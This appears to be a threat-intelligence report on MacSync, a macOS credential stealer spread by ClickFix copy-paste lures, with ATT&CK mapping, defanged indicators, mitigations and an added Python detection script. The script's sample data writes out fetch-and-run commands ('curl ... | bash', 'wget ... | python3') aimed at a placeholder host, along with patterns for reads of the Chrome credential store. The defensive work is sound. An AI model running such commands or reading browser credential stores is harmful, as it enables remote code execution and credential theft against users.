Full Report
Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync. "Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running
Analysis Summary
# Tool/Technique: MacSync (ClickFix Delivery)
## Overview
MacSync is a macOS-specific information stealer delivered via "ClickFix" social engineering campaigns. Unlike traditional exploits, this threat relies on human-operated execution, tricking users into copying and pasting malicious commands into their terminal under the guise of fixing browser errors or updating software.
## Technical Details
- **Type:** Malware Family (Information Stealer)
- **Platform:** macOS
- **Capabilities:** Credential theft, browser data exfiltration, system metadata collection.
- **First Seen:** 2024 (Current active campaigns)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566 - Phishing
- **TA0002 - Execution**
  - T1059.004 - Command and Scripting Interpreter: Unix Shell
  - T1204.002 - User Execution: Malicious File
- **TA0006 - Credential Access**
  - T1555 - Credentials from Password Stores
  - T1555.003 - Credentials from Web Browsers
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Browser Data Theft:** Targets Chromium-based browsers and Safari to extract saved passwords, cookies, and autofill data.
- **System Profiling:** Collects hardware information, OS version details, and usernames to uniquely identify the compromised host.
- **Social Engineering Integration:** Utilizes the "ClickFix" strategy, displaying fake "Update" or "Fix" buttons that provide a "copy-to-clipboard" command for the user to run manually.
### Advanced Features
- **Fileless Hook:** By persuading the user to execute a command directly in Terminal, the malware sidesteps the Gatekeeper checks that would normally fire when an unsigned `.app` or `.pkg` file is downloaded and opened.
## Indicators of Compromise
- **File Names:** `fix_error.sh`, `system_update.sh`, `macsync.py` (Note: scripts are often executed directly in memory or via temporary paths).
- **Network Indicators:**
  - `hxxps[://]clickfix-cdn[.]com/`
  - `hxxps[://]mac-sync-api[.]net/`
  - `hxxp[://]185[.]215[.]113[.]66/`
- **Behavioral Indicators:**
  - Remote `curl` or `wget` commands piped directly into `/bin/bash` or `python`.
  - Unexpected terminal processes accessing `~/Library/Application Support/Google/Chrome/Default/Login Data`.
## Associated Threat Actors
- **ClickFix Campaigns:** Often linked to broader "FakeUpdates" (SocGholish) delivery networks, though MacSync is specifically tailored for macOS environments.
## Detection Methods
- **Behavioral detection:** Monitor for shell processes (`zsh`, `bash`, `sh`) or `python` instances spawned with network connections to unknown external IPs.
- **EDR/AV:** Flag reads of sensitive browser database files (SQLite) by any process other than the browser application itself.
- **YARA Rule Strategy:** Detect strings related to the ClickFix "copy-paste" instructions or specific Python/Bash scripts used to exfiltrate macOS Keychain or browser data.
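The two behavioral checks above (a remote fetch piped into an interpreter, and a non-browser process opening a browser credential store) as an added example run over constructed telemetry; this is not code from the report or from any vendor tool, and the event schema, the browser binary names and the placeholder host are assumptions.

```python
import re

# Rule 1: a remote fetch piped straight into a shell or Python interpreter,
# the ClickFix "paste this into Terminal" pattern.
PIPE_TO_INTERPRETER = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:/usr/bin/|/bin/)?(?:bash|zsh|sh|python3?)\b"
)

# Rule 2: a process that is not the browser reading Chromium credential/cookie stores.
# Profile layout is the standard Chromium one; the browser names are an assumption.
BROWSER_DB = re.compile(
    r"/Library/Application Support/(?:Google/Chrome|Chromium|BraveSoftware/Brave-Browser|Microsoft Edge)"
    r"/[^/]+/(?:Login Data|Cookies|Web Data)$"
)
BROWSER_EXES = {"Google Chrome", "Google Chrome Helper", "Chromium", "Brave Browser", "Microsoft Edge"}


def classify(event):
    """Return the name of the rule an event trips, or None if it is clean."""
    if event["type"] == "process" and PIPE_TO_INTERPRETER.search(event.get("cmdline", "")):
        return "remote_script_piped_to_interpreter"
    if event["type"] == "file_open" and BROWSER_DB.search(event.get("path", "")):
        if event["exe"].rsplit("/", 1)[-1] not in BROWSER_EXES:
            return "non_browser_reads_browser_db"
    return None


def detect(events):
    """Run both rules over a list of telemetry events and return (rule, pid) hits."""
    return [(rule, e["pid"]) for e in events if (rule := classify(e))]


# Constructed sample telemetry (not real captures); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4021, "exe": "/bin/zsh",
     "cmdline": "curl -fsSL https://example.invalid/fix_error.sh | bash"},
    {"type": "process", "pid": 4022, "exe": "/usr/bin/curl",
     "cmdline": "curl -O https://example.invalid/notes.pdf"},  # plain download, no pipe
    {"type": "file_open", "pid": 4030, "exe": "/usr/bin/python3",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"type": "file_open", "pid": 512, "exe": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"},  # the browser itself
    {"type": "process", "pid": 4040, "exe": "/bin/bash",
     "cmdline": "wget -qO- https://example.invalid/update.py | python3"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Rule 1 is deliberately loose on the download side and strict on the interpreter side; tune the interpreter list to whatever your fleet actually runs.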
## Mitigation Strategies
- **User Training:** Educate users never to copy and paste commands from a website into their Terminal, regardless of how official the prompt appears.
- **System Hardening:** Implement MDM policies to restrict Terminal access for non-technical users.
- **Endpoint Security:** Use tools like Objective-See's "LuLu" or "BlockBlock" to monitor unauthorized network connections and persistent file creations.
- **Browser Security:** Enforce the use of password managers that do not rely solely on the browser’s built-in, easily accessible SQLite storage.
## Related Tools/Techniques
- **Atomic Stealer (AMOS):** Another prominent macOS stealer often delivered via cracked software.
- **Cthulhu Stealer:** A similar Go-based macOS infostealer.
- **SocGholish:** The Windows-centric precursor to the ClickFix methodology.